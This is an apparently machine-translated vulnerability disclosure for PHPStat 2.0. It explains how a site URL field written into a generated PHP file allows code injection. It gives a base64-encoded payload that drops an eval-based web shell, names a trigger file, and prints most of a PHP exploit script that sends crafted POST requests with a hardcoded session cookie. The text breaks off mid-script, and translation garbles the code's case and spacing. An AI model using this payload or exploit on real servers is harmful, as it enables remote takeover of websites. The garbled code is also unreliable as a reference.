PHPStat 2.0 Remote Code Execution Vulnerability

Flyh4t [Wolvez.org]

PHPStat is a professional website traffic statistics software system that provides website log analysis, website data analysis, and user behavior analysis systems to provide customers with in-depth mining of cross-site traffic data reports. there is a unique analysis system in visitor behavior analysis, network marketing analysis, and website decision-making support. This gives customers the real and valuable things behind the data and provides feasible recommendations. The system developer puaisi positions himself as the most professional website data analysis technology provider in China. The code written is indeed good, but the security is very poor, and vulnerabilities are everywhere visible. Websites that use PHPStat statistics can be killed by hackers in seconds.
The vast majority of the Code in this system is zend encrypted. After decryption, let's look at the code for modifying statistics websites by common users in user_info.php (similar to the Code for creating a website)

++ ++
......
$ FileStr. = "<? If (! Defined (WEB_HOME) exit (Access Denied );";
$ FileStr. = "if (file_exists (" ../count/exclusion/website _ ". $ websiteid." _ regexp. php "))";
$ FileStr. = "include_once" ../count/exclusion/website _ ". $ websiteid." _ regexp. php ";";
$ FileStr. = "// website address Statistics ";
$ FileStr. = "$ siteurl =" ". $ _ POST [site]." ";";
$ FileStr. = "// list of IP addresses excluded by the program ";
......
$ FileStr. = "$ mainsitecode =" ". $ Tmp [sitegroup]." ";";
$ FileStr. = "?> ";
If (! File_exists (COUNT_DIRNAME. "/exclusion/website _". $ Tmp [website]. ". php "))
{
Write_to_file (COUNT_DIRNAME. "/exclusion/website _". $ Tmp [website]. ". php", "", "w + ");
}
......
++ ++, If the website number added by a common user is 100003, the configuration file is
Countexclusionwebsite_20.3.php. The content format is as follows:

++ ++
<?
If (! Defined (WEB_HOME) exit (Access Denied );
If (file_exists ("../count/exclusion/website _". $ websiteid. "_ regexp. php "))
Include_once "../count/exclusion/website _". $ websiteid. "_ regexp. php ";

// Count the website address
$ Siteurl = "http: // 127.0.0.1 ";

// List of IP addresses excluded by the program

// The program contains the directory address list

// Code of the main site to which the program belongs
$ Mainsitecode = "50 ";
?>
++ ++, The submitted siteurl is written into the PHP file and enclosed in double quotation marks. Should anyone familiar with php understand it? Using Double quotation marks, we can construct a special siteurl to write the file and run it successfully. The constructed siteurl is as follows:

++ ++
Http: // $ {$ {fputs (fopen (base64_decode (ZmwucGhw), w), base64_decode (PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4x ))}}
++ ++? Php @ eval ($ _ POST [a]);?> 1 to the fl. php file. Base64_encode encoding avoids the use of single quotes, so you do not need to consider the impact of gpc. Note: If the character string does not contain special symbols such as + =, base64_decode does not require single or double silver quotes.
There is still one problem left, the code starting with the file if (! Defined (WEB_HOME) exit (Access Denied); limits that we can directly trigger this small shellcode. We must find a file that defines WEB_HOME to include it. PHPStat provides multiple such files. We will continue to read part of the code in the emplatesmscommonop. php file, which can be accessed directly.

++ ++
<?
Session_start ();
Include_once.../../include. inc/config. inc. php;
Include_once.../../include. inc/function. php;
Include_once.../include. inc/function_pagerank.php;
Include_once.../include. inc/global. inc. php;
Include_once.../include. inc/conn. db. inc. php;
Include_once.../include. inc/pdo_page.inc.php;
Include_once.../parse_site.php;

$ Website = strtolower (strval ($ _ GET [website]);
$ Action = strtolower (strval ($ _ GET [action]);
$ Websiteid = $ website;
$ QueryLimit = new queryLimit ();
If (strval ($ _ GET [showtype]) = all) $ website = $ website. "& showtype = all ";

Include_once ".../". COUNT_DIRNAME. "/exclusion/website _". $ websiteid. ". php ";
// Our code can be triggered here
++ ++ Analysis is here, the following describes how to use exploit for learning.

++ ++
<? Php
Print_r (
+ --------------------------------------------------------------------------- +
PHPStat 2.0 remote code execution exploit
By Flyh4t
+ --------------------------------------------------------------------------- +
);
If ($ argc <3 ){
Print_r (
+ --------------------------------------------------------------------------- +
Usage: php. $ argv [0]. host path website
Example: php. $ argv [0]. localhost/PHPStat2/100001
+ --------------------------------------------------------------------------- +
);
Exit;
}
Error_reporting (7 );
Ini_set (max_execution_time, 0 );
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Website = $ argv [3];
$ Websiteid = $ website-100000;
$ Cookie = PHPStatCookie = PHPStat; PHPStatUser = flyh4t; PHPSESSID = 16971168032f872c76a4bfe99bc9ee7a;
$ Cmd = sitename = flyh4t & website =. $ website. & sitedes = flyh4t & site = http % 3A % 2F % 2F $ {$ {fputs (fopen (base64_decode (ZmwucGhw), w), base64_decode (Signature ))}} & websitetype = % D7 % DB % BA % CF % C3 % C5 % BB % A7 & siteshow = 0 & siterank = 0 & sitetype = 0 & exclusionip = & exclusioninter = & action = updatesite & websiteid =. $ websiteid;
$ Shell = http: //. $ host. $ path. templates/MS/common/fl. php;
Send1 ($ cmd );
Send2 ();
If (! File_get_contents ($ url) & file_get_contents ($ shell) = 1)
Exit ("Expoilt Success! View Your shell: $ shell ");
Else
Exit ("Exploit Failed! ");

Function send1 ($ cmd)
{
Global $ host, $ path, $ website, $ cookie;
$ Message = "POST". $ path. "user_info.php? Action = editsite & website = $ website HTTP/1.1 ";
$ Message. = "Accept :*/*";
$ Message. = "Referer: http: // $ host $ path ";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ host ";
$ Message. = "Content-Length:". strlen ($ cmd )."";
$ Message. = "Connection: Close ";
$ Message. = "Cookie: $ cookie ";
$ Message. = $ cmd;
$ Fp = fsockopen ($ hos